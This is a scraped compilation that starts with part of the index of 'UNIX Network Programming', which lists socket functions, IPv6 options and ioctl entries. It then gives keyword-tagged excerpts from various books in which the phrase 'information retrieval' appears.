25, 103, 234, 471, 480 IFF_BROADCAST constant, 480 IFF_POINTOPOINT constant, 480 IFF_PROMISC constant, 792 IFF_UP constant, 480 ifi_hlen member, 473, 478, 502 ifi_index member, 502 ifi_info structure, 469, 471, 473, 475, 478, 484, 500, 502, 608 ifi_next member, 471, 478 ifm_addrs member, 489, 493 966 UNIX Network Programming ifm_type member, 502 ifma_msghdr structure, 487 definition of, 488 ifmam_addrs member, 489 IFNAMSIZ constant, 504 ifr_addr member, 469, 480 – 481 ifr_broadaddr member, 469, 481, 484 ifr_data member, 469 ifr_dstaddr member, 469, 481, 484 ifr_flags member, 469, 480 – 481 ifr_metric member, 469, 481 ifr_name member, 470, 480 ifreq structure, 467 – 468, 470, 475, 477, 480, 484, 568 definition of, 469 IFT_NONE constant, 591 IGMP (Internet Group Management Protocol), 33 – 34, 556, 735, 739 – 740, 871 checksum, 753 ILP32, programming model, 28 imperfect multicast filtering, 555 implementation ICMP message daemon, 769 – 786 ping program, 741 – 754 traceroute program, 755 – 768 imr_interface member, 560, 562, 568 imr_multiaddr member, 560, 562 imr_sourceaddr member, 562 IN6_IS_ADDR_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_LOOPBACK macro, definition of, 360 IN6_IS_ADDR_MC_GLOBAL macro, definition of, 360 IN6_IS_ADDR_MC_LINKLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_NODELOCAL macro, definition of, 360 IN6_IS_ADDR_MC_ORGLOCAL macro, definition of, 360 IN6_IS_ADDR_MC_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_MULTICAST macro, definition of, 360 IN6_IS_ADDR_SITELOCAL macro, definition of, 360 IN6_IS_ADDR_UNSPECIFIED macro, definition of, 360 IN6_IS_ADDR_V4COMPAT macro, definition of, 360 IN6_IS_ADDR_V4MAPPED macro, 355, 360, 362, 745 definition of, 360 in6_addr structure, 193, 561 definition of, 71 in6_pktinfo structure, 588, 615 – 617, 731 Index definition of, 616 IN6ADDR_ANY_INIT constant, 103, 320, 322, 412, 616, 881 IN6ADDR_LOOPBACK_INIT constant, 880 in6addr_any constant, 103, 881 in6addr_loopback constant, 880 in_addr structure, 70, 193, 308, 310, 358, 560, 563 definition of, 68 in_addr_t datatype, 69 – 70 in_cksum function, 753 source code, 753 in_pcbdetach function, 140 in_port_t datatype, 69 INADDR_ANY constant, 13, 53, 102 – 103, 122, 126, 214, 242, 288, 320, 322, 412, 534, 560 – 563, 859, 876, 915 INADDR_LOOPBACK constant, 876 INADDR_MAX_LOCAL_GROUP constant, 915 INADDR_NONE constant, 82, 901, 915 in-addr.arpa domain, 304, 310 in-band data, 645 incarnation, definition of, 44 incomplete connection queue, 104 index, interface, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 INET6_ADDRSTRLEN constant, 83, 86, 901 inet6_opt_append function, 723 – 724 definition of, 723 inet6_opt_find function, 725 definition of, 724 inet6_opt_finish function, 723 – 724 definition of, 723 inet6_opt_get_val function, 725 definition of, 724 inet6_opt_init function, 723 – 724 definition of, 723 inet6_option_alloc function, 732 inet6_option_append function, 732 inet6_option_find function, 732 inet6_option_init function, 732 inet6_option_next function, 732 inet6_option_space function, 732 inet6_opt_next function, 724 – 725 definition of, 724 inet6_opt_set_val function, 723 – 725 definition of, 723 inet6_rth_add function, 727 – 728 definition of, 727 inet6_rthdr_add function, 732 inet6_rthdr_getaddr function, 732 inet6_rthdr_getflags function, 732 inet6_rthdr_init function, 732 inet6_rthdr_lasthop function, 732 inet6_rthdr_reverse function, 732 inet6_rthdr_segments function, 732 inet6_rthdr_space function, 732 UNIX Network Programming inet6_rth_getaddr function, 728, 731 definition of, 728 inet6_rth_init function, 727 – 728 definition of, 727 inet6_rth_reverse function, 728, 730 definition of, 728 inet6_rth_segments function, 728, 731 definition of, 728 inet6_rth_space function, 727 – 728 definition of, 727 inet6_srcrt_print function, 730 – 731 INET_ADDRSTRLEN constant, 83, 86, 901 inet_addr function, 9, 67, 82 – 83, 93 definition of, 82 inet_aton function, 82 – 83, 93, 314 definition of, 82 inet_ntoa function, 67, 82 – 83, 343, 685 definition of, 82 inet_ntop function, 67, 82 – 86, 93, 110, 309, 341, 343, 345, 350, 593, 731 definition of, 83 IPv4-only version, source code, 85 inet_pton function, 8 – 9, 11, 67, 82 – 85, 93, 290, 333, 343, 930 definition of, 83 IPv4-only version, source code, 85 inet_pton_loose function, 93 inet_srcrt_add function, 713, 715 inet_srcrt_init function, 712, 715 inet_srcrt_print function, 714 inetd program, 61, 114, 118 – 119, 154, 363, 371 – 380, 587, 613 – 614, 825, 850, 897, 934, 945 Information Retrieval Service, see IRS INFTIM constant, 184, 902 init program, 132, 145, 938 init_v6 function, 749 initial thread, 676 in.rdisc program, 735 Institute of Electrical and Electronics Engineers, see IEEE int16_t datatype, 69 int32_t datatype, 69 int8_t datatype, 69 interface address, UDP, binding, 608 – 612 configuration, ioctl function, 468 – 469 index, 217, 489, 498, 502, 504 – 508, 560 – 563, 566, 569, 577, 616, 731 index, recvmsg function, receiving, 588 – 593 logical, 877 loopback, 23, 792, 799, 809, 876 – 877 message-based, 858 operations, ioctl function, 480 – 481 UDP determining outgoing, 261 – 262 interface-local multicast scope, 552 – 553 International Electrotechnical Commission, see IEC Index 967 International Organization for Standardization, see ISO Internet, 5, 22 Internet Assigned Numbers Authority, see IANA Internet Control Message Protocol, see ICMP Internet Control Message Protocol version 4, see ICMPv4 Internet Control Message Protocol version 6, see ICMPv6 Internet Draft, 947 Internet Engineering Task Force, see IETF Internet Group Management Protocol, see IGMP Internet Protocol, see IP Internet Protocol next generation, see IPng Internet Protocol version 4, see IPv4 Internet Protocol version 6, see IPv6 Internet service provider, see ISP Internetwork Packet Exchange, see IPX interoperability IPv4 and IPv6, 353 – 362 IPv4 client IPv6 server, 354 – 357 IPv6 client IPv4 server, 357 – 359 source code portability, 361 interprocess communication, see IPC interrupts, software, 129 inverse, ICMPv6 neighbor advertisement, 884 ICMPv6 neighbor solicitation, 884 I/O asynchronous, 160, 468, 663 definition of, Unix, 399 model, asynchronous, 158 – 159 model, blocking, 154 – 155 model, comparison of, 159 – 160 model, I/O, multiplexing, 156 – 157 model, nonblocking, 155 – 156 model, signal-driven, 157 – 158 models, 154 – 160 multiplexing, 153 – 189 multiplexing I/O, model, 156 – 157 nonblocking, 88, 165, 234 – 235, 388, 398, 435 – 464, 468, 665, 669, 671, 919, 945 signal-driven, 200, 234 – 235, 663 – 673 standard, 168, 344, 399 – 402, 409, 437, 935, 952 synchronous, 160 ioctl function, 191, 222, 233 – 234, 399, 403 – 404, 409, 420, 465 – 469, 474 – 475, 477 – 478, 480 – 485, 500, 538, 566, 568, 585, 647, 654, 664, 666, 669, 790, 792, 799, 852, 857, 868 ARP cache operations, 481 – 483 definition of, 466, 857 file operations, 468 interface configuration, 468 – 469 interface operations, 480 – 481 routing table operations, 483 – 484 socket operations, 466 – 467 STREAMS, 857 – 858 968 UNIX Network Programming IOV_MAX constant, 390 iov_base member, 389 iov_len member, 389, 392 iovec structure, 389 – 391, 393, 601 definition of, 389 IP (Internet Protocol), 33 fragmentation and broadcast, 537 – 538 fragmentation and multicast, 571 Multicast Infrastructure, 571, 584 – 585 Multicast Infrastructure session announcements, 571 – 575 routing, 869 spoofing, 108, 948 version number field, 869, 871 ip6_mtuinfo structure, definition of, 619 ip6.arpa domain, 304 ip6m_addr member, 619 ip6m_mtu member, 619 IP_ADD_MEMBERSHIP socket option, 193, 560, 562 IP_ADD_SOURCE_MEMBERSHIP socket option, 193, 560 IP_BLOCK_SOURCE socket option, 193, 560, 562 IP_DROP_MEMBERSHIP socket option, 193, 560 – 561 IP_DROP_SOURCE_MEMBERSHIP socket option, 193, 560 IP_HDRINCL socket option, 193, 214, 710, 736 – 738, 753, 755, 790, 793, 805 – 806 IP_MULTICAST_IF socket option, 193, 559, 563, 945 IP_MULTICAST_LOOP socket option, 193, 559, 563 IP_MULTICAST_TTL socket option, 193, 215, 559, 563, 871, 945 IP_OPTIONS socket option, 193, 214, 709 – 710, 718, 733, 945 IP_RECVDSTADDR socket option, 193, 211, 214, 251, 265, 392 – 396, 587 – 588, 590, 592, 608, 616, 620, 666, 895 ancillary data, picture of, 394 IP_RECVIF socket option, 193, 215, 395, 487, 588, 590, 592, 608, 620, 666 ancillary data, picture of, 591 IP_TOS socket option, 193, 215, 870, 895 IP_TTL socket option, 193, 215, 218, 755, 761, 871, 895 IP_UNBLOCK_SOURCE socket option, 193, 560 ip_id member, 740, 806 ip_len member, 737, 740, 806 ip_mreq structure, 193, 560, 568 definition of, 560 ip_mreq_source structure, 193 definition of, 562 ip_off member, 737, 740 IPC (interprocess communication), 411 – 412, Index 545 – 547, 675 ipi6_addr member, 616 ipi6_ifindex member, 616 ipi_addr member, 588, 901 ipi_ifindex member, 588, 901 IPng (Internet Protocol next generation), 871 ipopt_dst member, 714 ipopt_list member, 714 ipoption structure, definition of, 714 IPPROTO_ICMP constant, 736 IPPROTO_ICMPV6 constant, 193, 216, 738, 740 IPPROTO_IP constant, 214, 394 – 395, 591, 710 IPPROTO_IPV6 constant, 216, 395, 615 – 619, 722, 727 IPPROTO_RAW constant, 737 IPPROTO_SCTP constant, 97, 222, 288 IPPROTO_TCP constant, 97, 219, 288, 519 IPPROTO_UDP constant, 97 IPsec, 951 IPv4 (Internet Protocol version 4), 33, 869 address, 874 – 877 and IPv6 interoperability, 353 – 362 checksum, 214, 737, 753, 871 client IPv6 server, interoperability, 354 – 357 destination address, 871 fragment offset field, 871 header, 743, 755, 869 – 871 header length field, 870 header, picture of, 870 identification field, 870 multicast address, 549 – 551 multicast address, ethernet mapping, picture of, 550 options, 214, 709 – 711, 871 protocol field, 871 receiving packet information, 588 – 593 server, interoperability, IPv6 client, 357 – 359 socket address structure, 68 – 70 socket option, 214 – 215 source address, 871 source routing, 711 – 719 total length field, 870 IPv4-compatible IPv6 address, 880 IPv4/IPv6 host, definition of, 34 IPv4-mapped IPv6 address, 93, 322, 333, 354 – 360, 745, 879 – 880 IPv6 (Internet Protocol version 6), xx, 33, 871 address, 877 – 881 backbone, see 6bone checksum, 216, 738, 873 client IPv4 server, interoperability, 357 – 359 destination address, 873 destination options, 719 – 725 extension headers, 719 flow label field, 871 getaddrinfo function, 322 – 323 UNIX Network Programming header, 744, 755, 871 – 874 header, picture of, 872 historical advanced API, 732 hop-by-hop options, 719 – 725 interoperability, IPv4 and, 353 – 362 multicast address, 551 – 552 multicast address, ethernet mapping, picture of, 550 multicast address, picture of, 551 next header field, 872 options, see IPv6, extension headers path MTU control, 618 – 619 payload length field, 872 receiving packet information, 615 – 618 routing header, 725 – 731 server, interoperability, IPv4 client, 354 – 357 socket address structure, 71 – 72 socket option, 216 – 218 source address, 873 source routing, 725 – 731 source routing segments left, 725 source routing type, 725 sticky options, 731 – 732 IPV6_ADD_MEMBERSHIP socket option, 560 – 561 IPV6_ADDRFORM socket option, 361 IPV6_CHECKSUM socket option, 193, 216, 738 IPV6_DONTFRAG socket option, 216, 619 IPV6_DROP_MEMBERSHIP socket option, 560 – 561 IPV6_DSTOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_HOPLIMIT socket option, 193, 395, 617, 732, 749 – 750, 873 ancillary data, picture of, 615 IPV6_HOPOPTS socket option, 193, 395, 732 ancillary data, picture of, 722 IPV6_JOIN_GROUP socket option, 193, 560, 562 IPV6_LEAVE_GROUP socket option, 193, 561 IPV6_MULTICAST_HOPS socket option, 193, 559, 563, 617, 873 IPV6_MULTICAST_IF socket option, 193, 559, 563, 616 IPV6_MULTICAST_LOOP socket option, 193, 559, 563 IPV6_NEXTHOP socket option, 193, 217, 395, 617, 732 ancillary data, picture of, 615 IPV6_PATHMTU socket option, 217, 619 IPV6_PKTINFO socket option, 193, 251, 395, 561, 608, 616, 620, 666, 732 ancillary data, picture of, 615 IPV6_PKTOPTIONS socket option, 732 IPV6_RECVDSTOPTS socket option, 217, 722 IPV6_RECVHOPLIMIT socket option, 217 – 218, 617, 749, 873 IPV6_RECVHOPOPTS socket option, 217, 722 Index 969 IPV6_RECVPATHMTU socket option, 216 – 217, 619 IPV6_RECVPKTINFO socket option, 217, 616 – 617, 620 IPV6_RECVRTHDR socket option, 218, 727, 729 IPV6_RECVTCLASS socket option, 218, 618 IPV6_RTHDR socket option, 193, 395, 732 ancillary data, picture of, 727 IPV6_RTHDR_TYPE_0 constant, 727 IPV6_TCLASS socket option, 395, 618, 732, 871 ancillary data, picture of, 615 IPV6_UNICAST_HOPS socket option, 193, 218, 617, 755, 761, 873 IPV6_USE_MIN_MTU socket option, 218, 618 – 619 IPV6_V6ONLY socket option, 218, 357 IPV6_XXX socket options, 218 ipv6_mreq structure, 193, 560, 569 definition of, 560 ipv6mr_interface member, 560, 569 ipv6mr_multiaddr member, 560 IPX (Internetwork Packet Exchange), 952 IRS (Information Retrieval Service), 306 ISO (International Organization for Standardization), 18, 26, 950 ISO 8859, 573 ISP (Internet service provider), 875 iterative server, 15, 114, 243, 821 – 822 Jackson, A., 721, 952 Jacobson, V., 35, 38 – 39, 44, 571, 596, 598 – 599, 737, 788, 790, 896, 949 – 951 Jim, J., 285, 953 Jinmei, T., 28, 216, 397, 719, 738, 744, 953 joinable thread, 678 Jones, R. A., xxii–xxiii Josey, A., 25, 27, 950 Joy, W.


How to Form Your Own California Corporation by Anthony Mancuso

business cycle, corporate governance, corporate raider, distributed generation, estate planning, information retrieval, intangible asset, passive income, passive investing, Silicon Valley

If not, use the form provided on the website. California Secretary of State contact Information www.ss.ca.gov/business/corp/corporate.htm Office hours for all locations are Monday through Friday 8:00 a.m. to 5:00 p.m. Sacramento Office 1500 11th Street Sacramento, CA 95814 (916) 657-5448* • Name Availability Unit (*recorded information on how to obtain) • Document Filing Support Unit • Legal Review Unit • Information Retrieval and Certification Unit • Status (*recorded information on how to obtain) • Statement of Information Unit (filings only) P.O. Box 944230 Sacramento, CA 94244-2300 • Substituted Service of Process (must be hand delivered to the Sacramento office) San Francisco Regional Office 455 Golden Gate Avenue, Suite 14500 San Francisco, CA 94102-7007 415-557-8000 Fresno Regional Office 1315 Van Ness Ave., Suite 203 Fresno, CA 93721-1729 559-445-6900 Los Angeles Regional Office 300 South Spring Street, Room 12513 Los Angeles, CA 90013-1233 213-897-3062 San Diego Regional Office 1350 Front Street, Suite 2060 San Diego, CA 92101-3609 619-525-4113 California Department of Corporations contact information www.corp.ca.gov Contact Information The Department of Corporations, the office that receives your Notice of Stock Issuance, as explained in Chapter 5, Step 7, has four offices.


pages: 386 words: 91,913

The Elements of Power: Gadgets, Guns, and the Struggle for a Sustainable Future in the Rare Metal Age by David S. Abraham

3D printing, Airbus A320, carbon footprint, clean water, cleantech, commoditize, Deng Xiaoping, Elon Musk, en.wikipedia.org, glass ceiling, global supply chain, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, new economy, oil shale / tar sands, oil shock, reshoring, Robert Metcalfe, Ronald Reagan, Silicon Valley, South China Sea, Steve Ballmer, Steve Jobs, telemarketer, Tesla Model S, thinkpad, upwardly mobile, uranium enrichment, WikiLeaks, Y2K

The weights of rare earth materials included in the congressional committee report likely include a substantial weight portion from other metals as well. Ronald H. O’Rourke, “Navy Virginia (SSN-774) Class Attack Submarine Procurement: Background and Issues for Congress,” Congressional Research Service, July 31, 2014, http://www.fas.org/sgp/crs/weapons/RL32418.pdf. For information on Virginia class submarine purchases, see, “DDG 51 Arleigh Burke Class Guided Missile Destroyer,” Defense Acquisition Management Information Retrieval, December 31, 2012, accessed December 18, 2014, http://www.dod.mil/pubs/foi/logistics_material_readiness/acq_bud_fin/SARs/2012-sars/13-F-0884_SARs_as_of_Dec_2012/Navy/DDG_51_December_2012_SAR.pdf. For information on the DDG 51 Aegis Destroyer Ships as of 2012, including expected production until 2016, see “Next Global Positioning System Receiver Equipment,” Committee Reports 113th Congress (2013–2014), House Report 113-102, June 7, 2013, accessed December 18, 2014, thomas.loc.gov/cgi-bin/cpquery/?


pages: 443 words: 98,113

The Corruption of Capitalism: Why Rentiers Thrive and Work Does Not Pay by Guy Standing

3D printing, Airbnb, Albert Einstein, Amazon Mechanical Turk, Asian financial crisis, asset-backed security, bank run, banking crisis, basic income, Ben Bernanke: helicopter money, Bernie Sanders, Big bang: deregulation of the City of London, bilateral investment treaty, Bonfire of the Vanities, Boris Johnson, Bretton Woods, business cycle, Capital in the Twenty-First Century by Thomas Piketty, carried interest, cashless society, central bank independence, centre right, Clayton Christensen, collapse of Lehman Brothers, collective bargaining, credit crunch, crony capitalism, crowdsourcing, debt deflation, declining real wages, deindustrialization, disruptive innovation, Doha Development Round, Donald Trump, Double Irish / Dutch Sandwich, ending welfare as we know it, eurozone crisis, falling living standards, financial deregulation, financial innovation, Firefox, first-past-the-post, future of work, gig economy, Goldman Sachs: Vampire Squid, Growth in a Time of Debt, housing crisis, income inequality, information retrieval, intangible asset, invention of the steam engine, investor state dispute settlement, James Watt: steam engine, job automation, John Maynard Keynes: technological unemployment, labour market flexibility, light touch regulation, Long Term Capital Management, lump of labour, Lyft, manufacturing employment, Mark Zuckerberg, market clearing, Martin Wolf, means of production, mini-job, Mont Pelerin Society, moral hazard, mortgage debt, mortgage tax deduction, Neil Kinnock, non-tariff barriers, North Sea oil, Northern Rock, nudge unit, Occupy movement, offshore financial centre, oil shale / tar sands, open economy, openstreetmap, patent troll, payday loans, peer-to-peer lending, plutocrats, Plutocrats, Ponzi scheme, precariat, quantitative easing, remote working, rent control, rent-seeking, ride hailing / ride sharing, Right to Buy, Robert Gordon, Ronald Coase, Ronald Reagan, Sam Altman, savings glut, Second Machine Age, secular stagnation, sharing economy, Silicon Valley, Silicon Valley startup, Simon Kuznets, sovereign wealth fund, Stephen Hawking, Steve Ballmer, structural adjustment programs, TaskRabbit, The Chicago School, The Future of Employment, the payments system, The Rise and Fall of American Growth, Thomas Malthus, Thorstein Veblen, too big to fail, Travis Kalanick, Uber and Lyft, Uber for X, uber lyft, Y Combinator, zero-sum game, Zipcar

None of this should occur if there were ‘free markets’ or strong democratic systems that could change the rules. NOTES 1 D. McClintick, ‘How Harvard lost Russia’, Institutional Investor, 27 February 2006. 2 ‘The new age of crony capitalism’, The Economist, 15 March 2014, pp. 9, 53–4; ‘The party winds down’, The Economist, 7 May 2016, pp. 46–8. 3 M. Lupu, K. Mayer, J. Tait and A. J. Trippe (eds), Current Challenges in Patent Information Retrieval (Heidelberg: Springer-Verlag, 2011), p. v. 4 Letter to Isaac McPherson, 13 August 1813. A public good is one that can be consumed or used by one person without affecting its consumption or use by others; it is available to all. 5 ‘A question of utility’, The Economist, 8 August 2015. 6 M. Mazzucato, The Entrepreneurial State: Debunking Public vs Private Sector Myths (London: Anthem Press, 2013). 7 M.


Lessons-Learned-in-Software-Testing-A-Context-Driven-Approach by Anson-QA

anti-pattern, Chuck Templeton: OpenTable:, finite state, framing effect, full employment, information retrieval, job automation, knowledge worker, lateral thinking, Ralph Nader, Richard Feynman, side project, Silicon Valley, statistical model, web application

For example (these examples are all based on successes from our personal experience), imagine bringing in a smart person whose most recent work role was as an attorney who can analyze any specification you can give them and is trained as an advocate, a director of sales and marketing (the one we hired trained our staff in new methods of researching and writing bug reports to draw the attention of the marketing department), a hardware repair technician, a librarian (think about testing databases or other information retrieval systems), a programmer, a project manager (of nonsoftware projects), a technical support representative with experience supporting products like the ones you're testing, a translator (especially useful if your company publishes software in many languages), a secretary (think about all the information that you collect, store, and disseminate and all the time management you and your staff have to do), a system administrator who knows networks, or a user of the software you're testing.


pages: 352 words: 96,532

Where Wizards Stay Up Late: The Origins of the Internet by Katie Hafner, Matthew Lyon

air freight, Bill Duvall, computer age, conceptual framework, Donald Davies, Douglas Engelbart, Douglas Engelbart, fault tolerance, Hush-A-Phone, information retrieval, John Markoff, Kevin Kelly, Leonard Kleinrock, Marc Andreessen, Menlo Park, natural language processing, packet switching, RAND corporation, RFC: Request For Comment, Robert Metcalfe, Ronald Reagan, Silicon Valley, speech recognition, Steve Crocker, Steven Levy

The comments appeared in a paper written jointly, using e-mail, with five hundred miles between them. It was “published” electronically in the MsgGroup in 1977. They went on: “As computer communication systems become more powerful, more humane, more forgiving and above all, cheaper, they will become ubiquitous.” Automated hotel reservations, credit checking, real-time financial transactions, access to insurance and medical records, general information retrieval, and real-time inventory control in businesses would all come. In the late 1970s, the Information Processing Techniques Office’s final report to ARPA management on the completion of the ARPANET research program concluded similarly: “The largest single surprise of the ARPANET program has been the incredible popularity and success of network mail. There is little doubt that the techniques of network mail developed in connection with the ARPANET program are going to sweep the country and drastically change the techniques used for intercommunication in the public and private sectors.”


pages: 364 words: 102,926

What the F: What Swearing Reveals About Our Language, Our Brains, and Ourselves by Benjamin K. Bergen

correlation does not imply causation, information retrieval, pre–internet, Ronald Reagan, statistical model, Steven Pinker

Smith, M. (March 3, 2014). Richard Sherman calls NFL banning the N-word “an atrocious idea.” NBC Sports. Retrieved from http://profootballtalk.nbcsportscom/2014/03/03/richard-sherman-calls-nfl-banning-the-n-word-an-atrocious-idea. Snopes. (October 11, 2014). Pluck Yew. Retrieved from http://www.snopes.com/language/apocryph/pluckyew.asp. Social Security Administration. (n.d.). Background information. Retrieved from https://www.ssa.gov/oact/babynames/background.html. Songbass. (November 3, 2008). Obama gives McCain the middle finger. YouTube. Retrieved from https://www.youtube.com/watch?v=Pc8Wc1CN7sY. Spears, A. K. (1998). African-American language use: Ideology and so-called obscenity. In African-American English: Structure, history, and use, Salikoko S. Mufwene (Ed.), 226–250. New York: Routledge.


Your Own Allotment : How to Find It, Cultivate It, and Enjoy Growing Your Own Food by Russell-Jones, Neil.

Berlin Wall, British Empire, carbon footprint, Corn Laws, David Attenborough, discovery of the americas, information retrieval, Kickstarter, mass immigration, spice trade

YOUR OWN ALLOTMENT If you want to know how… How to Grow Your Own Food A week-by-week guide to wild life friendly fruit and vegetable gardening Planning and Creating Your First Garden A step-by-step guide to designing your garden – whatever your experience or knowledge How to Start Your Own Gardening Business An insider guide to setting yourself up as a professional gardener Please send for a free copy of the latest catalogue: How To Books Ltd Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom info@howtoboooks.co.uk www.howtobooks.co.uk YOUR OWN ALLOTMENT How to find it, cultivate it, and enjoy growing your own food Neil Russell-Jones SPRING HILL Published by How To Content, A division of How To Books Ltd, Spring Hill House, Spring Hill Road, Begbroke, Oxford OX5 1RX, United Kingdom. Tel: (01865) 375794. Fax: (01865) 379162. info@howtobooks.co.uk www.howtobooks.co.uk All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review), without the express permission of the publisher in writing. The right of Neil Russell-Jones to be identified as author of this work has been asserted by him in accordance with the Copyright, Design and Patents Act 1988. © 2008 Neil Russell-Jones First edition 2008 First published in electronic form 2008 British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 247 7 Cover design by Mousemat Design Illustrations by Deborah Andrews Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by Pantek Arts Ltd, Maidstone, Kent NOTE:The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in this book.The laws and regulations are complex and liable to change, and readers should check the current positions with the relevant authorities before making personal arrangements.


pages: 519 words: 102,669

Programming Collective Intelligence by Toby Segaran

always be closing, correlation coefficient, Debian, en.wikipedia.org, Firefox, full text search, information retrieval, PageRank, prediction markets, recommendation engine, slashdot, Thomas Bayes, web application

Searching and Ranking This chapter covers full-text search engines, which allow people to search a large set of documents for a list of words, and which rank results according to how relevant the documents are to those words. Algorithms for full-text searches are among the most important collective intelligence algorithms, and many fortunes have been made by new ideas in this field. It is widely believed that Google's rapid rise from an academic project to the world's most popular search engine was based largely on the PageRank algorithm, a variation that you'll learn about in this chapter. Information retrieval is a huge field with a long history. This chapter will only be able to cover a few key concepts, but we'll go through the construction of a search engine that will index a set of documents and leave you with ideas on how to improve things further. Although the focus will be on algorithms for searching and ranking rather than on the infrastructure requirements for indexing large portions of the Web, the search engine you build should have no problem with collections of up to 100,000 pages.


pages: 416 words: 106,582

This Will Make You Smarter: 150 New Scientific Concepts to Improve Your Thinking by John Brockman

23andMe, Albert Einstein, Alfred Russel Wallace, banking crisis, Barry Marshall: ulcers, Benoit Mandelbrot, Berlin Wall, biofilm, Black Swan, butterfly effect, Cass Sunstein, cloud computing, congestion charging, correlation does not imply causation, Daniel Kahneman / Amos Tversky, dark matter, data acquisition, David Brooks, delayed gratification, Emanuel Derman, epigenetics, Exxon Valdez, Flash crash, Flynn Effect, hive mind, impulse control, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Isaac Newton, Jaron Lanier, Johannes Kepler, John von Neumann, Kevin Kelly, lifelogging, mandelbrot fractal, market design, Mars Rover, Marshall McLuhan, microbiome, Murray Gell-Mann, Nicholas Carr, open economy, Pierre-Simon Laplace, place-making, placebo effect, pre–internet, QWERTY keyboard, random walk, randomized controlled trial, rent control, Richard Feynman, Richard Feynman: Challenger O-ring, Richard Thaler, Satyajit Das, Schrödinger's Cat, security theater, selection bias, Silicon Valley, Stanford marshmallow experiment, stem cell, Steve Jobs, Steven Pinker, Stewart Brand, the scientific method, Thorstein Veblen, Turing complete, Turing machine, twin studies, Vilfredo Pareto, Walter Mischel, Whole Earth Catalog, WikiLeaks, zero-sum game

Although some have written about information overload, data smog, and the like, my view has always been the more information online the better, as long as good search tools are available. Sometimes this information is found by directed search using a Web search engine, sometimes by serendipity by following links, and sometimes by asking hundreds of people in your social network or hundreds of thousands of people on a question-answering Web site such as Answers.com, Quora, or Yahoo Answers. I do not actually know of a real findability index, but tools in the field of information retrieval could be applied to develop one. One of the unsolved problems in the field is how to help the searcher to determine if the information simply is not available. An Assertion Is Often an Empirical Question, Settled by Collecting Evidence Susan Fiske Eugene Higgins Professor of Psychology, Princeton University; author, Envy Up, Scorn Down: How Status Divides Us The most important scientific concept is that an assertion is often an empirical question, settled by collecting evidence.


pages: 540 words: 103,101

Building Microservices by Sam Newman

airport security, Amazon Web Services, anti-pattern, business process, call centre, continuous integration, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, social graph, software as a service, source of truth, the built environment, web application, WebSocket

The benefit here is that if we use existing software for this purpose, someone has done much of the hard work for us. However, we still need to know how to set up and maintain these systems in a resilient fashion. Starting Again The architecture that gets you started may not be the architecture that keeps you going when your system has to handle very different volumes of load. As Jeff Dean said in his presentation “Challenges in Building Large-Scale Information Retrieval Systems” (WSDM 2009 conference), you should “design for ~10× growth, but plan to rewrite before ~100×.” At certain points, you need to do something pretty radical to support the next level of growth. Recall the story of Gilt, which we touched on in Chapter 6. A simple monolithic Rails application did well for Gilt for two years. Its business became increasingly successful, which meant more customers and more load.


pages: 433 words: 106,048

The End of Illness by David B. Agus

Danny Hillis, discovery of penicillin, double helix, epigenetics, germ theory of disease, Google Earth, impulse control, information retrieval, longitudinal study, meta analysis, meta-analysis, microbiome, Murray Gell-Mann, pattern recognition, Pepto Bismol, personalized medicine, randomized controlled trial, risk tolerance, Steve Jobs, the scientific method

The poll also found that 68 percent of those who have access have used the Internet to look for information about specific medicines, and nearly four in ten use it to look for other patients’ experiences of a condition. Without a doubt new technologies are helping more people around the world to find out more about their health and to make better-informed decisions, but often their online searches lack usefulness because the information retrieved cannot be personalized. Relying on dodgy information can easily lead people to take risks with inappropriate tests and treatments, wasting money and causing unnecessary worry. But with a health-record system like Dell’s and its developing infrastructure to tailor health advice and guidance to individual people based on their personal records, the outcome could be revolutionary to our health-care system, instigating the reform that’s sorely needed.


pages: 461 words: 106,027

Zero to Sold: How to Start, Run, and Sell a Bootstrapped Business by Arvid Kahl

"side hustle", business process, centre right, Chuck Templeton: OpenTable:, continuous integration, coronavirus, COVID-19, Covid-19, crowdsourcing, domain-specific language, financial independence, Google Chrome, if you build it, they will come, information asymmetry, information retrieval, inventory management, Jeff Bezos, job automation, Kubernetes, minimum viable product, Network effects, performance metric, post-work, premature optimization, risk tolerance, Ruby on Rails, sentiment analysis, Silicon Valley, software as a service, source of truth, statistical model, subscription business, supply-chain management, trickle-down economics, web application

You will need to guide them to the information they seek, because the entire due diligence process is a trust-building exercise, and your involvement in building the relationship in this process will set the tone for years to come. Start by explaining your documents and what they contain in an overview document. Provide a master document that gives your buyer quick access to the data they're looking for at a glance. If you're storing all of your documents in cloud storage like Google Drive, you can cross-link between documents easily. Anything you can do to speed up information retrieval will make the due diligence process less stressful. While the due diligence phase usually comes with certain legal guarantees, don't be naive: there will be bad actors in the field, and some people will just promise more than they're willing to do. While most buyers are serious, some may just want to take a look under the hood of your business. For that reason, I recommend staging the release of information, starting with the least sensitive (like an accurate yet not too detailed P&L sheet), and keeping the most critical information (like your internal roadmap documents) until the very end.


The Dream Machine: J.C.R. Licklider and the Revolution That Made Computing Personal by M. Mitchell Waldrop

